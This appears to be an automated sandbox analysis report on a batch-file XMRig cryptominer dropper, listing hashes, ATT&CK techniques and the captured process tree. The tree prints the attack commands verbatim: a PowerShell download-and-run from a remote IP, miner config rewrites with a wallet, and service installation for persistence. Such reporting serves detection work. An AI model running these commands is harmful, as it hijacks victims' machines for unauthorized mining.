xmrig | 1581804de8f5a5e4d6e0c0a6df326992b874d4d55c4c4d5e795c80f6f1c4c0ad

Analysis

max time kernel
996s
max time network
982s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
01/07/2024, 13:08

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

11309227811023.bat
Size

521B
MD5

e7bb44f7a40faf04de6eef414aeaac68
SHA1

feab06aa47a6b34a30085726103a58ea2d6ccf77
SHA256

1581804de8f5a5e4d6e0c0a6df326992b874d4d55c4c4d5e795c80f6f1c4c0ad
SHA512

3553e5a1fa4349a75aa0a4a61c833be8ae9d6fa10b3c4da49771e845938585fbd376277f976ff24ad91439be1f32d11ce6270761d7851a959903a6be575a0009

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://94.177.244.107:3000/miner

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/files/0x0007000000023266-64.dat	family_xmrig
behavioral2/files/0x0007000000023266-64.dat	xmrig
behavioral2/memory/2908-67-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-233-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-234-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-235-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-236-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-237-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-239-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-240-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-241-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-242-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-243-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-244-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-245-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-246-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-247-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-248-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-249-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-250-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-251-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-252-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-253-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-254-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-255-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-256-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-257-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-258-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-259-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-260-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-261-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-262-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-263-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-264-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/1140-265-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	5008	powershell.exe
11	3596	powershell.exe
25	3696	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
2908	xmrig.exe
4880	nssm.exe
3604	nssm.exe
2728	nssm.exe
3000	nssm.exe
1504	nssm.exe
2156	nssm.exe
1528	nssm.exe
1140	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
11	raw.githubusercontent.com
25	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1588	sc.exe
3480	sc.exe
1408	sc.exe
1188	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4900	powershell.exe
2892	powershell.exe
2208	powershell.exe
4216	powershell.exe
2920	powershell.exe
3084	powershell.exe
2220	powershell.exe
1088	powershell.exe
568	powershell.exe
3696	powershell.exe
5008	powershell.exe
3596	powershell.exe
4984	powershell.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4276	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
5008	powershell.exe
5008	powershell.exe
3596	powershell.exe
3596	powershell.exe
2920	powershell.exe
2920	powershell.exe
1088	powershell.exe
1088	powershell.exe
4900	powershell.exe
4900	powershell.exe
568	powershell.exe
568	powershell.exe
3084	powershell.exe
3084	powershell.exe
4984	powershell.exe
4984	powershell.exe
2220	powershell.exe
2220	powershell.exe
2892	powershell.exe
2892	powershell.exe
2208	powershell.exe
2208	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
4216	powershell.exe
4216	powershell.exe
4216	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
672	Process not Found

Suspicious use of AdjustPrivilegeToken 57 IoCs

description	pid	Process
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	4276	taskkill.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	3084	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	4216	powershell.exe
Token: SeLockMemoryPrivilege	1140	xmrig.exe
Token: SeIncreaseQuotaPrivilege	3348	WMIC.exe
Token: SeSecurityPrivilege	3348	WMIC.exe
Token: SeTakeOwnershipPrivilege	3348	WMIC.exe
Token: SeLoadDriverPrivilege	3348	WMIC.exe
Token: SeSystemProfilePrivilege	3348	WMIC.exe
Token: SeSystemtimePrivilege	3348	WMIC.exe
Token: SeProfSingleProcessPrivilege	3348	WMIC.exe
Token: SeIncBasePriorityPrivilege	3348	WMIC.exe
Token: SeCreatePagefilePrivilege	3348	WMIC.exe
Token: SeBackupPrivilege	3348	WMIC.exe
Token: SeRestorePrivilege	3348	WMIC.exe
Token: SeShutdownPrivilege	3348	WMIC.exe
Token: SeDebugPrivilege	3348	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3348	WMIC.exe
Token: SeRemoteShutdownPrivilege	3348	WMIC.exe
Token: SeUndockPrivilege	3348	WMIC.exe
Token: SeManageVolumePrivilege	3348	WMIC.exe
Token: 33	3348	WMIC.exe
Token: 34	3348	WMIC.exe
Token: 35	3348	WMIC.exe
Token: 36	3348	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3348	WMIC.exe
Token: SeSecurityPrivilege	3348	WMIC.exe
Token: SeTakeOwnershipPrivilege	3348	WMIC.exe
Token: SeLoadDriverPrivilege	3348	WMIC.exe
Token: SeSystemProfilePrivilege	3348	WMIC.exe
Token: SeSystemtimePrivilege	3348	WMIC.exe
Token: SeProfSingleProcessPrivilege	3348	WMIC.exe
Token: SeIncBasePriorityPrivilege	3348	WMIC.exe
Token: SeCreatePagefilePrivilege	3348	WMIC.exe
Token: SeBackupPrivilege	3348	WMIC.exe
Token: SeRestorePrivilege	3348	WMIC.exe
Token: SeShutdownPrivilege	3348	WMIC.exe
Token: SeDebugPrivilege	3348	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3348	WMIC.exe
Token: SeRemoteShutdownPrivilege	3348	WMIC.exe
Token: SeUndockPrivilege	3348	WMIC.exe
Token: SeManageVolumePrivilege	3348	WMIC.exe
Token: 33	3348	WMIC.exe
Token: 34	3348	WMIC.exe
Token: 35	3348	WMIC.exe
Token: 36	3348	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1140	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3324 wrote to memory of 5008	3324	cmd.exe	91
PID 3324 wrote to memory of 5008	3324	cmd.exe	91
PID 5008 wrote to memory of 4840	5008	powershell.exe	92
PID 5008 wrote to memory of 4840	5008	powershell.exe	92
PID 4840 wrote to memory of 3652	4840	cmd.exe	93
PID 4840 wrote to memory of 3652	4840	cmd.exe	93
PID 3652 wrote to memory of 2800	3652	net.exe	94
PID 3652 wrote to memory of 2800	3652	net.exe	94
PID 4840 wrote to memory of 3912	4840	cmd.exe	95
PID 4840 wrote to memory of 3912	4840	cmd.exe	95
PID 4840 wrote to memory of 1020	4840	cmd.exe	96
PID 4840 wrote to memory of 1020	4840	cmd.exe	96
PID 4840 wrote to memory of 2128	4840	cmd.exe	97
PID 4840 wrote to memory of 2128	4840	cmd.exe	97
PID 4840 wrote to memory of 4560	4840	cmd.exe	98
PID 4840 wrote to memory of 4560	4840	cmd.exe	98
PID 4840 wrote to memory of 3720	4840	cmd.exe	99
PID 4840 wrote to memory of 3720	4840	cmd.exe	99
PID 4840 wrote to memory of 1588	4840	cmd.exe	100
PID 4840 wrote to memory of 1588	4840	cmd.exe	100
PID 4840 wrote to memory of 3480	4840	cmd.exe	101
PID 4840 wrote to memory of 3480	4840	cmd.exe	101
PID 4840 wrote to memory of 4276	4840	cmd.exe	102
PID 4840 wrote to memory of 4276	4840	cmd.exe	102
PID 4840 wrote to memory of 3596	4840	cmd.exe	104
PID 4840 wrote to memory of 3596	4840	cmd.exe	104
PID 4840 wrote to memory of 2920	4840	cmd.exe	105
PID 4840 wrote to memory of 2920	4840	cmd.exe	105
PID 4840 wrote to memory of 1088	4840	cmd.exe	106
PID 4840 wrote to memory of 1088	4840	cmd.exe	106
PID 4840 wrote to memory of 2908	4840	cmd.exe	107
PID 4840 wrote to memory of 2908	4840	cmd.exe	107
PID 4840 wrote to memory of 1396	4840	cmd.exe	108
PID 4840 wrote to memory of 1396	4840	cmd.exe	108
PID 1396 wrote to memory of 4900	1396	cmd.exe	109
PID 1396 wrote to memory of 4900	1396	cmd.exe	109
PID 4900 wrote to memory of 2032	4900	powershell.exe	110
PID 4900 wrote to memory of 2032	4900	powershell.exe	110
PID 4840 wrote to memory of 568	4840	cmd.exe	111
PID 4840 wrote to memory of 568	4840	cmd.exe	111
PID 4840 wrote to memory of 3084	4840	cmd.exe	112
PID 4840 wrote to memory of 3084	4840	cmd.exe	112
PID 4840 wrote to memory of 4984	4840	cmd.exe	113
PID 4840 wrote to memory of 4984	4840	cmd.exe	113
PID 4840 wrote to memory of 2220	4840	cmd.exe	114
PID 4840 wrote to memory of 2220	4840	cmd.exe	114
PID 4840 wrote to memory of 2892	4840	cmd.exe	115
PID 4840 wrote to memory of 2892	4840	cmd.exe	115
PID 4840 wrote to memory of 2208	4840	cmd.exe	116
PID 4840 wrote to memory of 2208	4840	cmd.exe	116
PID 4840 wrote to memory of 3696	4840	cmd.exe	120
PID 4840 wrote to memory of 3696	4840	cmd.exe	120
PID 4840 wrote to memory of 4216	4840	cmd.exe	121
PID 4840 wrote to memory of 4216	4840	cmd.exe	121
PID 4840 wrote to memory of 1408	4840	cmd.exe	123
PID 4840 wrote to memory of 1408	4840	cmd.exe	123
PID 4840 wrote to memory of 1188	4840	cmd.exe	124
PID 4840 wrote to memory of 1188	4840	cmd.exe	124
PID 4840 wrote to memory of 4880	4840	cmd.exe	125
PID 4840 wrote to memory of 4880	4840	cmd.exe	125
PID 4840 wrote to memory of 3604	4840	cmd.exe	126
PID 4840 wrote to memory of 3604	4840	cmd.exe	126
PID 4840 wrote to memory of 2728	4840	cmd.exe	127
PID 4840 wrote to memory of 2728	4840	cmd.exe	127

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11309227811023.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://94.177.244.107:3000/miner', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp13D1.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4840
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3652
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:2800
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:3912
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:1020
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:2128
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:4560
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:3720
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1588
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3480
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1088
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:2908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1396
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4900
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:2032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Oailvcny\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4216
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1408
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1188
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:4880
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:3604
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:2728
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:3000
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:1504
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:2156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3348

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:1528
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4048 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
1⤵
PID:1516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3624 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
1⤵
PID:3012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b6d02603b05644e3ecbbbc677b6d4beb

SHA1
23804670edc6314163d5fcc17c53ebf796ac6d8f

SHA256
e29f4dd90313d0813956670f60cb4e2b4b040542ae149277b542be399137d452

SHA512
8d3f6628f9dd107b095b7bb3ad6ec85da3bedea2bb2d25e9e9155026a3757c80b4023c97ae9b9446a92e95f6c05c1e739f8f56c28794a6521616b2c0651c59c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2f82dfb02206c0fd0520bd7d9720c63d

SHA1
eefde3c6c959ac5a93f72fe581c3c73786b9db63

SHA256
fd67df90c43bb4283a8f4d563788734f61de3a0285d87731d928b8e8a9501c04

SHA512
1971370cc7edc954402ec8f04aef89293f0adcbf556fd317c2653c29702da082e3b280fdf9aac31b9a7272e3bf453ff2d829bc294b98a9ca3a7d639d4fac23ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b109c2386c7a1d87d5d4ba0e6190e07

SHA1
73648e5bc928facdae173c70c2ff197cc7cdb405

SHA256
